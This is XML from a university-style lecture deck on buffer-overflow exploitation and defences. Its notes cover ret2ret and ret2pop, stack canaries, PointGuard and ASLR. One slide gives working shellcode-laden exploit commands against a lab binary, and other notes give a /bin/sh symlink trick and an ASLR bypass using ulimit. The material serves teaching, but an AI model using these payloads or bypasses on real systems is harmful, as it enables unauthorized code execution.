              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> sort of technique is called stack juggling sometimes. It’s not always applicable.   We overwrite with the address of a ‘ret’ instruction. Note this is possible because 1) .text is not randomized, and 2) every program contains a ret.  The &amp;ret here means the address of a return.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>When the function return, ret = pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, walking up the stack. Finally we jump to the address of the shellcode. Note that it overwrites the low-order byte. If the pointer already points to shellcode, this is a point of imprecision. note it may help out as well, e.g., the overwritten pointer does not point to shellcode. in this case, the NULL will make the address smaller, potentially making it point to shellcode (that is the 0x00 animation).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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2AE8BB4-A898-D345-AE9A-F34C0B9E2B1A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3411987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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> is an example program for which ret2ret is possible.  You overwrite everything from the ret address up to &amp;no with the address of a ret instruction.  You will overwrite the least significant byte of &amp;no with a null. This will mean &amp;no points down on the stack (towards buffer).  The final ret (just before &amp;no on the stack) will cause control to be transferred to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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2AE8BB4-A898-D345-AE9A-F34C0B9E2B1A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32606329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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2pop is a variant where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> we can skip over the NULL byte problem mentioned in ret2ret.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419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5F26031-2EAD-D446-8028-96BC67D6E127}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="863326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2000">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\xe3\x84\x04\x08"x18 . "\x73\x85\x04\x08"') $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\x73\x85\x04\x08"') foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440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8D9A443-4CE4-8C42-83F1-0D704836F220}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1516489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system is called on ANY character followed by a null byte, you can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>symlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that byte to /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –s `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –e ‘print “\x84”’` /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) – only local attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ulimit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –s unlimited makes the stack size as large as possible, this means there is no available space to move around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, so it will not be randomized (can verify with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ldd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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3221497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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> buffer overflow before a function returns</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358955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lowest byte of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in little endian, that’s the least significant byte</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335175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ShRiKant’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> asked: what happened with caller’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335175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previously</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> it allocates 64 + 8 = 72 bytes, now 76</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a reference to another segment (the so called Thread Local Storage (TLS)).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This code is moving the value at %gs:20 into ebp-4 in the prologue, which is checked at the epilogue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeroFlag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> =&gt; je</a:t>
            </a:r>
          </a:p>
          <a:p>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335175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terminator canary:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> won’t terminate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1085298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Pointguard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is Cowan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2003 USENIX Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>EncodePointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Note here for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> references that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> may contain buffers as well.  Heap isn’t protected at all with this scheme. </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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1117428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execstack</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17323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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId2"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2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag53.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag54.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag50.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag59.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag60.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag56.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag57.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63.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag64.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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73.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag75.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag71.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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78.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag76.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.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83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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88.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag89.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag90.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag87.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93.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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96.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag97.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag98.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag99.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag100.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag101.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag94.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag95.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04.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag105.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag102.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" 